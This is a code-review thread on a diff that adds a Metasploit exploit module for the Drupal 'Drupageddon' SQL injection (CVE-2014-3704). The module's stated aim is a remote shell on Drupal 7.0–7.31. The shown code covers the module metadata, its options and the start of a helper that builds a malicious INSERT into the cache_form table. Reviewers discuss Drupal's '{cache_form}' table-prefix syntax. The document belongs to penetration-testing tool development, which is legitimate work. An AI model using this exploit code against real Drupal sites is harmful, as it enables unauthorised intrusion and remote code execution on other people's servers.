modules/exploits/multi/http/drupal_cve2014_3704.rb

```diff
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# For technical details on the exploit implemented here, see:
+# https://www.whitewinterwolf.com/posts/2017/11/16/drupageddon-revisited-a-new-path-from-sql-injection-to-remote-command-execution-cve-2014-3704/
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Drupal HTTP Parameter Key/Value SQL Injection',
+      'Description'    => %q{
+        This module exploits the Drupal HTTP Parameter Key/Value SQL Injection
+        (aka Drupageddon) in order to achieve a remote shell on the vulnerable
+        instance. This module was tested against Drupal 7.0 and 7.31 (was fixed
+        in 7.32).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'SektionEins',          # discovery
+          'WhiteWinterWolf',      # msf module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-3704'],
+          ['URL', 'https://www.drupal.org/SA-CORE-2014-005'],
+          ['URL', 'http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Drupal 7.0 - 7.31',{}]],
+      'DisclosureDate' => 'Oct 15 2014',
+      'DefaultTarget'  => 0,
+      'Payload'        =>
+        {
+          # Rough estimate, maximum HTTP header size is server dependant.
+          'Space'          => 7000,
+          # Don't pad the payload with 6K space chars.
+          'MaxNops'        => 0,
+        },
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/'])
+      ])
+
+    register_advanced_options(
+      [
+        OptInt.new('WAIT', [true, "Number of seconds to wait before triggering the payload sent.", 5])
+      ])
+  end
+
+  def sql_insert(id, value)
+    curlyopen = rand_text_alphanumeric(8)
+    curlyclose = rand_text_alphanumeric(8)
+    value.gsub!('{', curlyopen)
+    value.gsub!('}', curlyclose)
+
+    "INSERT INTO {cache_form} (cid, data, expire, created, serialized) " \
```

Comment:
{cache_form} is correct or #{cache_form} should be there ?

Reply:
`{cache_form}` is correct.

Reply:
It is indeed intended. For information the syntax '{cache_form}' is used by Drupal to allow to prefix table names (let's say you have configured Drupal to prefix all table names with 'foo_', then '{cache_form}' will be expanded as 'foo_cache_form').